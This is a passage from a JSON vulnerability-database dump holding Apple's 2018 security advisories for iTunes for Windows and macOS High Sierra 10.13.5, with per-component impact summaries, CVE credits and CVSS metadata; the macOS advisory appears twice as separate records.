7 and later\n\nImpact: Visiting a maliciously crafted website may leak sensitive data\n\nDescription: Credentials were unexpectedly sent when fetching CSS mask images. This was addressed by using a CORS-enabled fetch method.\n\nCVE-2018-4190: Jun Kokatsu (@shhnjk)\n\n**WebKit**\n\nAvailable for: Windows 7 and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: An out-of-bounds read was addressed with improved input validation.\n\nCVE-2018-4222: natashenka of Google Project Zero\n\n**WebKit**\n\nAvailable for: Windows 7 and later\n\nImpact: Processing maliciously crafted web content may lead to code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2018-4145: found by OSS-Fuzz\n\nEntry added October 18, 2018\n\nInformation about products not manufactured by Apple, or independent websites not controlled or tested by Apple, is provided without recommendation or endorsement. Apple assumes no responsibility with regard to the selection, performance, or use of third-party websites or products. Apple makes no representations regarding third-party website accuracy or reliability. [Contact the vendor](<http://support.apple.com/kb/HT2693>) for additional information.\n\nPublished Date: March 05, 2021\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-05-29T00:00:00", "type": "apple", "title": "About the security content of iTunes 12.7.5 for Windows", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-4145", "CVE-2018-4188", "CVE-2018-4190", "CVE-2018-4192", "CVE-2018-4194", "CVE-2018-4199", "CVE-2018-4200", "CVE-2018-4201", "CVE-2018-4204", "CVE-2018-4214", "CVE-2018-4218", "CVE-2018-4222", "CVE-2018-4224", "CVE-2018-4225", "CVE-2018-4226", "CVE-2018-4232", "CVE-2018-4233", "CVE-2018-4246"], "modified": "2018-05-29T00:00:00", "id": "APPLE:E86C067FDA2C97D52BE9FC136361BDF7", "href": "https://support.apple.com/kb/HT208852", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-11-10T17:00:25", "description": "# About the security content of macOS High Sierra 10.13.5, Security Update 2018-003 Sierra, Security Update 2018-003 El Capitan\n\nThis document describes the security content of macOS High Sierra 10.13.5, Security Update 2018-003 Sierra, Security Update 2018-003 El Capitan.\n\n## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page. You can encrypt communications with Apple using the [Apple Product Security PGP Key](<https://support.apple.com/kb/HT201601>).\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\n\n\n## macOS High Sierra 10.13.5, Security Update 2018-003 Sierra, Security Update 2018-003 El Capitan\n\nReleased June 1, 2018\n\n**Accessibility Framework**\n\nAvailable for: macOS High Sierra 10.13.4\n\nImpact: A malicious application may be able to execute arbitrary code with system privileges\n\nDescription: An information disclosure issue existed in Accessibility Framework. This issue was addressed with improved memory management.\n\nCVE-2018-4196: Alex Plaskett, Georgi Geshev and Fabian Beterke of MWR Labs working with Trend Micro\u2019s Zero Day Initiative, and WanderingGlitch of Trend Micro Zero Day Initiative\n\nEntry updated July 19, 2018\n\n**AMD**\n\nAvailable for: macOS High Sierra 10.13.4\n\nImpact: A local user may be able to read kernel memory\n\nDescription: An out-of-bounds read issue existed that led to the disclosure of kernel memory. This was addressed with improved input validation.\n\nCVE-2018-4253: shrek_wzw of Qihoo 360 Nirvan Team\n\n**AMD**\n\nAvailable for: macOS High Sierra 10.13.4\n\nImpact: A local user may be able to read kernel memory\n\nDescription: An out-of-bounds read was addressed with improved input validation.\n\nCVE-2018-4256: shrek_wzw of Qihoo 360 Nirvan Team\n\nEntry added July 19, 2018\n\n**AMD**\n\nAvailable for: macOS High Sierra 10.13.4\n\nImpact: A local user may be able to read kernel memory\n\nDescription: An out-of-bounds read was addressed with improved input validation.\n\nCVE-2018-4255: shrek_wzw of Qihoo 360 Nirvan Team\n\nEntry added October 18, 2018, updated December 14, 2018\n\n**AMD**\n\nAvailable for: macOS High Sierra 10.13.4\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: An input validation issue existed in the kernel. This issue was addressed with improved input validation.\n\nCVE-2018-4254: an anonymous researcher\n\nEntry added October 18, 2018\n\n**AMD**\n\nAvailable for: macOS High Sierra 10.13.4\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: An input validation issue existed in the kernel. This issue was addressed with improved input validation.\n\nCVE-2018-4254: shrek_wzw of Qihoo 360 Nirvan Team\n\nEntry added October 24, 2018\n\n**AppleGraphicsControl**\n\nAvailable for: macOS High Sierra 10.13.4\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A buffer overflow was addressed with improved bounds checking.\n\nCVE-2018-4258: shrek_wzw of Qihoo 360 Nirvan Team\n\nEntry added October 18, 2018\n\n**AppleGraphicsPowerManagement**\n\nAvailable for: macOS High Sierra 10.13.4\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A buffer overflow was addressed with improved size validation.\n\nCVE-2018-4257: shrek_wzw of Qihoo 360 Nirvan Team\n\nEntry added October 18, 2018\n\n**apache_mod_php**\n\nAvailable for: macOS High Sierra 10.13.4\n\nImpact: Issues in php were addressed in this update\n\nDescription: This issue was addressed by updating to php version 7.1.16.\n\nCVE-2018-7584: Wei Lei and Liu Yang of Nanyang Technological University\n\n**ATS**\n\nAvailable for: macOS High Sierra 10.13.4\n\nImpact: A malicious application may be able to elevate privileges\n\nDescription: A type confusion issue was addressed with improved memory handling.\n\nCVE-2018-4219: Mohamed Ghannam (@_simo36)\n\n**Bluetooth**\n\nAvailable for: MacBook Pro (Retina, 15-inch, Mid 2015), MacBook Pro (Retina, 15-inch, 2015), MacBook Pro (Retina, 13-inch, Early 2015), MacBook Pro (15-inch, 2017), MacBook Pro (15-inch, 2016), MacBook Pro (13-inch, Late 2016, Two Thunderbolt 3 Ports), MacBook Pro (13-inch, Late 2016, Four Thunderbolt 3 Ports), MacBook Pro (13-inch, 2017, Four Thunderbolt 3 Ports), MacBook (Retina, 12-inch, Early 2016), MacBook (Retina, 12-inch, Early 2015), MacBook (Retina, 12-inch, 2017), iMac Pro, iMac (Retina 5K, 27-inch, Late 2015), iMac (Retina 5K, 27-inch, 2017), iMac (Retina 4K, 21.5-inch, Late 2015), iMac (Retina 4K, 21.5-inch, 2017), iMac (21.5-inch, Late 2015), and iMac (21.5-inch, 2017)\n\nImpact: An attacker in a privileged network position may be able to intercept Bluetooth traffic\n\nDescription: An input validation issue existed in Bluetooth. This issue was addressed with improved input validation.\n\nCVE-2018-5383: Lior Neumann and Eli Biham\n\nEntry added July 23, 2018\n\n**Bluetooth**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6\n\nImpact: A malicious application may be able to determine kernel memory layout.\n\nDescription: An information disclosure issue existed in device properties. This issue was addressed with improved object management.\n\nCVE-2018-4171: shrek_wzw of Qihoo 360 Nirvan Team\n\n**CoreGraphics**\n\nAvailable for: macOS High Sierra 10.13.4\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: An out-of-bounds read was addressed with improved input validation.\n\nCVE-2018-4194: Jihui Lu of Tencent KeenLab, Yu Zhou of Ant-financial Light-Year Security Lab\n\nEntry added June 21, 2018\n\n**CUPS**\n\nAvailable for: macOS High Sierra 10.13.4\n\nImpact: A local process may modify other processes without entitlement checks\n\nDescription: An issue existed in CUPS. This issue was addressed with improved access restrictions.\n\nCVE-2018-4180: Dan Bastone of Gotham Digital Science\n\nEntry added July 11, 2018\n\n**CUPS**\n\nAvailable for: macOS High Sierra 10.13.4\n\nImpact: A local user may be able to read arbitrary files as root\n\nDescription: An issue existed in CUPS. This issue was addressed with improved access restrictions.\n\nCVE-2018-4181: Eric Rafaloff and John Dunlap of Gotham Digital Science\n\nEntry added July 11, 2018\n\n**CUPS**\n\nAvailable for: macOS High Sierra 10.13.4\n\nImpact: A sandboxed process may be able to circumvent sandbox restrictions\n\nDescription: An access issue was addressed with additional sandbox restrictions on CUPS.\n\nCVE-2018-4182: Dan Bastone of Gotham Digital Science\n\nEntry added July 11, 2018\n\n**CUPS**\n\nAvailable for: macOS High Sierra 10.13.4\n\nImpact: A sandboxed process may be able to circumvent sandbox restrictions\n\nDescription: An access issue was addressed with additional sandbox restrictions.\n\nCVE-2018-4183: Dan Bastone and Eric Rafaloff of Gotham Digital Science\n\nEntry added July 11, 2018\n\n**EFI**\n\nAvailable for: macOS High Sierra 10.13.4\n\nImpact: An attacker with physical access to a device may be able to elevate privileges\n\nDescription: A validation issue was addressed with improved logic.\n\nCVE-2018-4478: an anonymous researcher, an anonymous researcher, Ben Erickson of Trusted Computer Consulting, LLC\n\nEntry added February 15, 2019\n\n**Firmware**\n\nAvailable for: macOS High Sierra 10.13.4\n\nImpact: A malicious application with root privileges may be able to modify the EFI flash memory region\n\nDescription: A device configuration issue was addressed with an updated configuration.\n\nCVE-2018-4251: Maxim Goryachy and Mark Ermolov\n\n**FontParser**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, macOS High Sierra 10.13.4\n\nImpact: Processing a maliciously crafted font file may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed with improved validation.\n\nCVE-2018-4211: Proteas of Qihoo 360 Nirvan Team\n\n**Grand Central Dispatch**\n\nAvailable for: macOS High Sierra 10.13.4\n\nImpact: A sandboxed process may be able to circumvent sandbox restrictions\n\nDescription: An issue existed in parsing entitlement plists. This issue was addressed with improved input validation.\n\nCVE-2018-4229: Jakob Rieck (@0xdead10cc) of the Security in Distributed Systems Group, University of Hamburg\n\n**Graphics Drivers**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, macOS High Sierra 10.13.4\n\nImpact: An application may be able to read restricted memory\n\nDescription: A validation issue was addressed with improved input sanitization.\n\nCVE-2018-4159: Axis and pjf of IceSword Lab of Qihoo 360\n\n**Hypervisor**\n\nAvailable for: macOS High Sierra 10.13.4\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption vulnerability was addressed with improved locking.\n\nCVE-2018-4242: Zhuo Liang of Qihoo 360 Nirvan Team\n\nEntry added October 30, 2018\n\n**iBooks**\n\nAvailable for: macOS High Sierra 10.13.4\n\nImpact: An attacker in a privileged network position may be able to spoof password prompts in iBooks\n\nDescription: An input validation issue was addressed with improved input validation.\n\nCVE-2018-4202: Jerry Decime\n\n**Identity Services**\n\nAvailable for: macOS High Sierra 10.13.4\n\nImpact: A malicious application may be able to access local users AppleIDs\n\nDescription: A privacy issue in the handling of Open Directory records was addressed with improved indexing.\n\nCVE-2018-4217: Jacob Greenfield of Commonwealth School\n\nEntry added December 10, 2018\n\n**Intel Graphics Driver**\n\nAvailable for: macOS High Sierra 10.13.4\n\nImpact: An application may be able to read restricted memory\n\nDescription: A validation issue was addressed with improved input sanitization.\n\nCVE-2018-4141: an anonymous researcher, Zhao Qixun (@S0rryMybad) of Qihoo 360 Vulcan Team\n\n**IOFireWireAVC**\n\nAvailable for: macOS High Sierra 10.13.4\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A race condition was addressed with improved locking.\n\nCVE-2018-4228: Benjamin Gnahm (@mitp0sh) of Mentor Graphics\n\n**IOGraphics**\n\nAvailable for: macOS High Sierra 10.13.4\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2018-4236: Zhao Qixun(@S0rryMybad) of Qihoo 360 Vulcan Team\n\n**IOHIDFamily**\n\nAvailable for: macOS High Sierra 10.13.4\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2018-4234: Proteas of Qihoo 360 Nirvan Team\n\n**Kernel**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, macOS High Sierra 10.13.4\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2018-4249: Kevin Backhouse of Semmle Ltd.\n\nEntry updated December 18, 2018\n\n**Kernel**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6\n\nImpact: A malicious application may be able to execute arbitrary code with kernel privileges\n\nDescription: In some circumstances, some operating systems may not expect or properly handle an Intel architecture debug exception after certain instructions. The issue appears to be from an undocumented side effect of the instructions. An attacker might utilize this exception handling to gain access to Ring 0 and access sensitive memory or control operating system processes.\n\nCVE-2018-8897: Andy Lutomirski, Nick Peterson (linkedin.com/in/everdox) of Everdox Tech LLC\n\n**Kernel**\n\nAvailable for: macOS High Sierra 10.13.4\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A buffer overflow was addressed with improved bounds checking.\n\nCVE-2018-4241: Ian Beer of Google Project Zero\n\nCVE-2018-4243: Ian Beer of Google Project Zero\n\n**libxpc**\n\nAvailable for: macOS High Sierra 10.13.4\n\nImpact: An application may be able to gain elevated privileges\n\nDescription: A logic issue was addressed with improved validation.\n\nCVE-2018-4237: Samuel Gro\u00df (@5aelo) working with Trend Micro\u2019s Zero Day Initiative\n\n**libxpc**\n\nAvailable for: macOS High Sierra 10.13.4\n\nImpact: An application may be able to execute arbitrary code with system privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2018-4404: Samuel Gro\u00df (@5aelo) working with Trend Micro\u2019s Zero Day Initiative\n\nEntry added October 30, 2018\n\n**Mail**\n\nAvailable for: macOS High Sierra 10.13.4\n\nImpact: An attacker may be able to exfiltrate the contents of S/MIME- encrypted e-mail\n\nDescription: An issue existed in the handling of encrypted Mail. This issue was addressed with improved isolation of MIME in Mail.\n\nCVE-2018-4227: Damian Poddebniak of M\u00fcnster University of Applied Sciences, Christian Dresen of M\u00fcnster University of Applied Sciences, Jens M\u00fcller of Ruhr University Bochum, Fabian Ising of M\u00fcnster University of Applied Sciences, Sebastian Schinzel of M\u00fcnster University of Applied Sciences, Simon Friedberger of KU Leuven, Juraj Somorovsky of Ruhr University Bochum, J\u00f6rg Schwenk of Ruhr University Bochum\n\n**Messages**\n\nAvailable for: macOS High Sierra 10.13.4\n\nImpact: A local user may be able to conduct impersonation attacks\n\nDescription: An injection issue was addressed with improved input validation.\n\nCVE-2018-4235: Anurodh Pokharel of Salesforce.com\n\n**Messages**\n\nAvailable for: macOS High Sierra 10.13.4\n\nImpact: Processing a maliciously crafted message may lead to a denial of service\n\nDescription: This issue was addressed with improved message validation.\n\nCVE-2018-4240: Sriram (@Sri_Hxor) of PrimeFort Pvt. Ltd\n\n**NVIDIA Graphics Drivers**\n\nAvailable for: macOS High Sierra 10.13.4\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A race condition was addressed with improved locking.\n\nCVE-2018-4230: Ian Beer of Google Project Zero\n\n**Security**\n\nAvailable for: macOS High Sierra 10.13.4\n\nImpact: Users may be tracked by malicious websites using client certificates\n\nDescription: An issue existed in the handling of S-MIME certificates. This issue was addressed with improved validation of S-MIME certificates.\n\nCVE-2018-4221: Damian Poddebniak of M\u00fcnster University of Applied Sciences, Christian Dresen of M\u00fcnster University of Applied Sciences, Jens M\u00fcller of Ruhr University Bochum, Fabian Ising of M\u00fcnster University of Applied Sciences, Sebastian Schinzel of M\u00fcnster University of Applied Sciences, Simon Friedberger of KU Leuven, Juraj Somorovsky of Ruhr University Bochum, J\u00f6rg Schwenk of Ruhr University Bochum\n\n**Security**\n\nAvailable for: macOS High Sierra 10.13.4\n\nImpact: A local user may be able to read a persistent account identifier\n\nDescription: An authorization issue was addressed with improved state management.\n\nCVE-2018-4223: Abraham Masri (@cheesecakeufo)\n\n**Security**\n\nAvailable for: macOS High Sierra 10.13.4\n\nImpact: A local user may be able to read a persistent device identifier\n\nDescription: An authorization issue was addressed with improved state management.\n\nCVE-2018-4224: Abraham Masri (@cheesecakeufo)\n\n**Security**\n\nAvailable for: macOS High Sierra 10.13.4\n\nImpact: A local user may be able to modify the state of the Keychain\n\nDescription: An authorization issue was addressed with improved state management.\n\nCVE-2018-4225: Abraham Masri (@cheesecakeufo)\n\n**Security**\n\nAvailable for: macOS High Sierra 10.13.4\n\nImpact: A local user may be able to view sensitive user information\n\nDescription: An authorization issue was addressed with improved state management.\n\nCVE-2018-4226: Abraham Masri (@cheesecakeufo)\n\n**Speech**\n\nAvailable for: macOS High Sierra 10.13.4\n\nImpact: A sandboxed process may be able to circumvent sandbox restrictions\n\nDescription: A sandbox issue existed in the handling of microphone access. This issue was addressed with improved handling of microphone access.\n\nCVE-2018-4184: Jakob Rieck (@0xdead10cc) of the Security in Distributed Systems Group, University of Hamburg\n\n**UIKit**\n\nAvailable for: macOS High Sierra 10.13.4\n\nImpact: Processing a maliciously crafted text file may lead to a denial of service\n\nDescription: A validation issue existed in the handling of text. This issue was addressed with improved validation of text.\n\nCVE-2018-4198: Hunter Byrnes\n\n**Windows Server**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, macOS High Sierra 10.13.4\n\nImpact: An application may be able to execute arbitrary code with system privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2018-4193: Markus Gaasedelen, Amy Burnett, and Patrick Biernat of Ret2 Systems, Inc working with Trend Micro\u2019s Zero Day Initiative, Richard Zhu (fluorescence) working with Trend Micro\u2019s Zero Day Initiative\n\nEntry updated October 8, 2019\n\nInformation about products not manufactured by Apple, or independent websites not controlled or tested by Apple, is provided without recommendation or endorsement. Apple assumes no responsibility with regard to the selection, performance, or use of third-party websites or products. Apple makes no representations regarding third-party website accuracy or reliability. [Contact the vendor](<http://support.apple.com/kb/HT2693>) for additional information.\n\nPublished Date: October 08, 2019\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 6.0}, "published": "2018-06-01T00:00:00", "type": "apple", "title": "About the security content of macOS High Sierra 10.13.5, Security Update 2018-003 Sierra, Security Update 2018-003 El Capitan", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-4141", "CVE-2018-4159", "CVE-2018-4171", "CVE-2018-4180", "CVE-2018-4181", "CVE-2018-4182", "CVE-2018-4183", "CVE-2018-4184", "CVE-2018-4193", "CVE-2018-4194", "CVE-2018-4196", "CVE-2018-4198", "CVE-2018-4202", "CVE-2018-4211", "CVE-2018-4217", "CVE-2018-4219", "CVE-2018-4221", "CVE-2018-4223", "CVE-2018-4224", "CVE-2018-4225", "CVE-2018-4226", "CVE-2018-4227", "CVE-2018-4228", "CVE-2018-4229", "CVE-2018-4230", "CVE-2018-4234", "CVE-2018-4235", "CVE-2018-4236", "CVE-2018-4237", "CVE-2018-4240", "CVE-2018-4241", "CVE-2018-4242", "CVE-2018-4243", "CVE-2018-4249", "CVE-2018-4251", "CVE-2018-4253", "CVE-2018-4254", "CVE-2018-4255", "CVE-2018-4256", "CVE-2018-4257", "CVE-2018-4258", "CVE-2018-4404", "CVE-2018-4478", "CVE-2018-5383", "CVE-2018-7584", "CVE-2018-8897"], "modified": "2018-06-01T00:00:00", "id": "APPLE:CBA8BD9BD1E4F4D2B32B5AB72B152FD0", "href": "https://support.apple.com/kb/HT208849", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-24T20:42:38", "description": "## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page. You can encrypt communications with Apple using the [Apple Product Security PGP Key](<https://support.apple.com/kb/HT201601>).\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\n\n\n## macOS High Sierra 10.13.5, Security Update 2018-003 Sierra, Security Update 2018-003 El Capitan\n\nReleased June 1, 2018\n\n**Accessibility Framework**\n\nAvailable for: macOS High Sierra 10.13.4\n\nImpact: A malicious application may be able to execute arbitrary code with system privileges\n\nDescription: An information disclosure issue existed in Accessibility Framework. This issue was addressed with improved memory management.\n\nCVE-2018-4196: Alex Plaskett, Georgi Geshev and Fabian Beterke of MWR Labs working with Trend Micro\u2019s Zero Day Initiative, and WanderingGlitch of Trend Micro Zero Day Initiative\n\nEntry updated July 19, 2018\n\n**AMD**\n\nAvailable for: macOS High Sierra 10.13.4\n\nImpact: A local user may be able to read kernel memory\n\nDescription: An out-of-bounds read issue existed that led to the disclosure of kernel memory. This was addressed with improved input validation.\n\nCVE-2018-4253: shrek_wzw of Qihoo 360 Nirvan Team\n\n**AMD**\n\nAvailable for: macOS High Sierra 10.13.4\n\nImpact: A local user may be able to read kernel memory\n\nDescription: An out-of-bounds read was addressed with improved input validation.\n\nCVE-2018-4256: shrek_wzw of Qihoo 360 Nirvan Team\n\nEntry added July 19, 2018\n\n**AMD**\n\nAvailable for: macOS High Sierra 10.13.4\n\nImpact: A local user may be able to read kernel memory\n\nDescription: An out-of-bounds read was addressed with improved input validation.\n\nCVE-2018-4255: shrek_wzw of Qihoo 360 Nirvan Team\n\nEntry added October 18, 2018, updated December 14, 2018\n\n**AMD**\n\nAvailable for: macOS High Sierra 10.13.4\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: An input validation issue existed in the kernel. This issue was addressed with improved input validation.\n\nCVE-2018-4254: an anonymous researcher\n\nEntry added October 18, 2018\n\n**AMD**\n\nAvailable for: macOS High Sierra 10.13.4\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: An input validation issue existed in the kernel. This issue was addressed with improved input validation.\n\nCVE-2018-4254: shrek_wzw of Qihoo 360 Nirvan Team\n\nEntry added October 24, 2018\n\n**AppleGraphicsControl**\n\nAvailable for: macOS High Sierra 10.13.4\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A buffer overflow was addressed with improved bounds checking.\n\nCVE-2018-4258: shrek_wzw of Qihoo 360 Nirvan Team\n\nEntry added October 18, 2018\n\n**AppleGraphicsPowerManagement**\n\nAvailable for: macOS High Sierra 10.13.4\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A buffer overflow was addressed with improved size validation.\n\nCVE-2018-4257: shrek_wzw of Qihoo 360 Nirvan Team\n\nEntry added October 18, 2018\n\n**apache_mod_php**\n\nAvailable for: macOS High Sierra 10.13.4\n\nImpact: Issues in php were addressed in this update\n\nDescription: This issue was addressed by updating to php version 7.1.16.\n\nCVE-2018-7584: Wei Lei and Liu Yang of Nanyang Technological University\n\n**ATS**\n\nAvailable for: macOS High Sierra 10.13.4\n\nImpact: A malicious application may be able to elevate privileges\n\nDescription: A type confusion issue was addressed with improved memory handling.\n\nCVE-2018-4219: Mohamed Ghannam (@_simo36)\n\n**Bluetooth**\n\nAvailable for: MacBook Pro (Retina, 15-inch, Mid 2015), MacBook Pro (Retina, 15-inch, 2015), MacBook Pro (Retina, 13-inch, Early 2015), MacBook Pro (15-inch, 2017), MacBook Pro (15-inch, 2016), MacBook Pro (13-inch, Late 2016, Two Thunderbolt 3 Ports), MacBook Pro (13-inch, Late 2016, Four Thunderbolt 3 Ports), MacBook Pro (13-inch, 2017, Four Thunderbolt 3 Ports), MacBook (Retina, 12-inch, Early 2016), MacBook (Retina, 12-inch, Early 2015), MacBook (Retina, 12-inch, 2017), iMac Pro, iMac (Retina 5K, 27-inch, Late 2015), iMac (Retina 5K, 27-inch, 2017), iMac (Retina 4K, 21.5-inch, Late 2015), iMac (Retina 4K, 21.5-inch, 2017), iMac (21.5-inch, Late 2015), and iMac (21.5-inch, 2017)\n\nImpact: An attacker in a privileged network position may be able to intercept Bluetooth traffic\n\nDescription: An input validation issue existed in Bluetooth. This issue was addressed with improved input validation.\n\nCVE-2018-5383: Lior Neumann and Eli Biham\n\nEntry added July 23, 2018\n\n**Bluetooth**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6\n\nImpact: A malicious application may be able to determine kernel memory layout.\n\nDescription: An information disclosure issue existed in device properties. This issue was addressed with improved object management.\n\nCVE-2018-4171: shrek_wzw of Qihoo 360 Nirvan Team\n\n**CoreGraphics**\n\nAvailable for: macOS High Sierra 10.13.4\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: An out-of-bounds read was addressed with improved input validation.\n\nCVE-2018-4194: Jihui Lu of Tencent KeenLab, Yu Zhou of Ant-financial Light-Year Security Lab\n\nEntry added June 21, 2018\n\n**CUPS**\n\nAvailable for: macOS High Sierra 10.13.4\n\nImpact: A local process may modify other processes without entitlement checks\n\nDescription: An issue existed in CUPS. This issue was addressed with improved access restrictions.\n\nCVE-2018-4180: Dan Bastone of Gotham Digital Science\n\nEntry added July 11, 2018\n\n**CUPS**\n\nAvailable for: macOS High Sierra 10.13.4\n\nImpact: A local user may be able to read arbitrary files as root\n\nDescription: An issue existed in CUPS. This issue was addressed with improved access restrictions.\n\nCVE-2018-4181: Eric Rafaloff and John Dunlap of Gotham Digital Science\n\nEntry added July 11, 2018\n\n**CUPS**\n\nAvailable for: macOS High Sierra 10.13.4\n\nImpact: A sandboxed process may be able to circumvent sandbox restrictions\n\nDescription: An access issue was addressed with additional sandbox restrictions on CUPS.\n\nCVE-2018-4182: Dan Bastone of Gotham Digital Science\n\nEntry added July 11, 2018\n\n**CUPS**\n\nAvailable for: macOS High Sierra 10.13.4\n\nImpact: A sandboxed process may be able to circumvent sandbox restrictions\n\nDescription: An access issue was addressed with additional sandbox restrictions.\n\nCVE-2018-4183: Dan Bastone and Eric Rafaloff of Gotham Digital Science\n\nEntry added July 11, 2018\n\n**EFI**\n\nAvailable for: macOS High Sierra 10.13.4\n\nImpact: An attacker with physical access to a device may be able to elevate privileges\n\nDescription: A validation issue was addressed with improved logic.\n\nCVE-2018-4478: an anonymous researcher, an anonymous researcher, Ben Erickson of Trusted Computer Consulting, LLC\n\nEntry added February 15, 2019\n\n**Firmware**\n\nAvailable for: macOS High Sierra 10.13.4\n\nImpact: A malicious application with root privileges may be able to modify the EFI flash memory region\n\nDescription: A device configuration issue was addressed with an updated configuration.\n\nCVE-2018-4251: Maxim Goryachy and Mark Ermolov\n\n**FontParser**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, macOS High Sierra 10.13.4\n\nImpact: Processing a maliciously crafted font file may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed with improved validation.\n\nCVE-2018-4211: Proteas of Qihoo 360 Nirvan Team\n\n**Grand Central Dispatch**\n\nAvailable for: macOS High Sierra 10.13.4\n\nImpact: A sandboxed process may be able to circumvent sandbox restrictions\n\nDescription: An issue existed in parsing entitlement plists. This issue was addressed with improved input validation.\n\nCVE-2018-4229: Jakob Rieck (@0xdead10cc) of the Security in Distributed Systems Group, University of Hamburg\n\n**Graphics Drivers**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, macOS High Sierra 10.13.4\n\nImpact: An application may be able to read restricted memory\n\nDescription: A validation issue was addressed with improved input sanitization.\n\nCVE-2018-4159: Axis and pjf of IceSword Lab of Qihoo 360\n\n**Hypervisor**\n\nAvailable for: macOS High Sierra 10.13.4\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption vulnerability was addressed with improved locking.\n\nCVE-2018-4242: Zhuo Liang of Qihoo 360 Nirvan Team\n\nEntry added October 30, 2018\n\n**iBooks**\n\nAvailable for: macOS High Sierra 10.13.4\n\nImpact: An attacker in a privileged network position may be able to spoof password prompts in iBooks\n\nDescription: An input validation issue was addressed with improved input validation.\n\nCVE-2018-4202: Jerry Decime\n\n**Identity Services**\n\nAvailable for: macOS High Sierra 10.13.4\n\nImpact: A malicious application may be able to access local users AppleIDs\n\nDescription: A privacy issue in the handling of Open Directory records was 